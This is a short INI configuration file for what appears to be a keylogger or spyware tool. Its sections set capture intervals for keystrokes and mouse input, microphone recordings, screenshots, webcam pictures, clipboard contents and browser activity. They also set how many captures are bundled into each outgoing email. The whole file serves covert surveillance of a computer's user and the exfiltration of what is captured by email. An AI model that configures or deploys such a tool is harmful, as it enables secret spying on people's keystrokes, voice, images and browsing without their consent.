[DEFAULT]
# Feel free to put a custom path here. This is not required.
LOGS_DIRECTORY_PATH = 

[INPUT]
# Number of times the mouse/keyboard are logged before an email is sent
LOGS_PER_EMAIL = 10000

[MICROPHONE]
# Length of each microphone recording (in seconds)
INTERVAL = 60
# How many recordings to record before sending an email
RECORDINGS_PER_EMAIL = 300

[SCREEN]
# Time in seconds before each screenshot
INTERVAL = 60
# How many screenshots to take before an email is sent
SCREENSHOTS_PER_EMAIL = 300

[WEBCAM]
# Time in seconds before each picture
INTERVAL = 60
# How many pictures to take before an email is sent
PICTURES_PER_EMAIL = 300

[CLIPBOARD]
# Time in seconds before the clipboard is logged
INTERVAL = 500
# How many times the clipboard is logged before an email is sent
PASTES_PER_EMAIL = 20

[BROWSER]
# Time in seconds before browser activity is logged
INTERVAL = 20000
# How many browser logs to include in each email
LOGS_PER_EMAIL = 1
